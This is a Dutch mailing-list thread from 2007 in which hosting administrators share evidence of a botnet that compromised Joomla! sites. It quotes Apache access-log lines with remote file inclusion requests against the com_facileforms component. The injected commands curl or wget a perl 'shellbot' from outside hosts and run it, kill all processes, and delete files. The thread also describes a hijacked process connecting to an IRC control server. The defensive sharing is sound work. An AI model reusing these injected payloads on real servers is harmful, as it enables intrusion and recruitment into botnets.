Inmiddels weer wat meer info van een klant, het lijkt er op dat er meer modules worden misbruikt van Joomla!: 200.215.129.17 - - [22/May/2007:08:03:59 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=kill%20-9%20-1%00 HTTP/1.0" 200 8557 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:08:10:41 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=cd%20/tmp;curl%20-o%20shellbot.txt%20http://www.fotospaya.com/.../shellbot.txt;perl%20shellbot.txt%00 HTTP/1.0" 200.215.129.17 - - [22/May/2007:08:15:15 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=cd%20/tmp;wget%20http://www.fotospaya.com/.../shellbot.txt;perl%20shellbot.txt%00 HTTP/1.0" 200 7036 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:08:20:05 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=GET%20http://www.fotospaya.com/.../shellbot.txt|perl%00 HTTP/1.0" 200 7014 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:08:24:04 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=lynx%20-source%20www.fotospaya.com/.../shellbot.txt|perl%00 HTTP/1.0" 200 7016 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:04:02:07 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=cd%20/tmp;curl%20-o%20shellbot.txt%20http://r3dlabel.googlepages.com/shellbot.txt;perl%20shellbot.txt%00 HTTP/1.0" 200 7016 "-" "DataCha0s/2.0" 200.215.129.17 - - [22/May/2007:04:08:02 +0200] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://207.213.245.213/.../cmd.gif?&cmd=rm%20-rf%20/tmp/*shell*%00 HTTP/1.0" 200 8575 "-" "DataCha0s/2.0" Doe er je voordeel mee. On Tue, 22 May 2007, ProServe - Peter Batenburg wrote:
Nou, het is echt feest deze week. Hier is de volgende lijst, alleen nu iets groter: http://www.proserve.nl/~peter/botnet7.txt Zelfde verhaal qua processes als vorige keer, alleen nu weten we ook via welk script de machines gehacked zijn. Zoek naar rs_gallery plugin van Joomla!
Stuur deze lijst naar zo veel mogelijk mensen door, ik zie weer veel dezelfde hosts verschijnen helaas :(
On Sat, 19 May 2007, ProServe - Peter Batenburg wrote:
Hoi,
Wederom ben ik een botnet tegen gekomen dmv het tracen op een gehackte dedicated server bij ons. Moet zeggen dat ik verrassend veel .nl machines tegen kom: http://www.proserve.nl/~peter/botnet6.txt Veel hosting toko's, dus vandaar dit mailtje. Omdat de IPs schijnbaar versleuteld zijn in de hostname, geeft de uname in de userinfo nog het beste beeld. Het is een flink netje, met ook flink wat power zo te zien. In iedergeval, deze ircd draait op 217.160.203.83 poort 23. Zojuist heeft de eigenaar de ircd gekilled lijkt het, dus ik ben benieuwd hoe het met de drones is afgelopen.
Dit process viel op, en deze bleef ook draaien na een stop van apache. apache 23570 79.8 0.3 5108 3112 ? R 06:25 345:14 /usr/sbin/httpd
Met een lsof was het duidelijk: perl 26331 apache 206u IPv4 15938897 TCP x.x.nl:55480->alb-server.de:telnet (SYN_SENT)
Helaas heb ik het process zelf niet gevonden in de standraard temp dirs, en ook heb ik nog niet kunnen vinden welke site hiervoor misbruikt is. Mochten mensen iets vinden, hoor ik het graag.
Deze lijst mag gedistribueerd worden, overal waar jullie het handig vinden.
-- /- Met vriendelijke groet/With kind regards, -\ <- Peter Batenburg - ProServe B.V. - www.proserve.nl -> \- tel: +31-78-6922222 - fax: +31-78-6922269 -/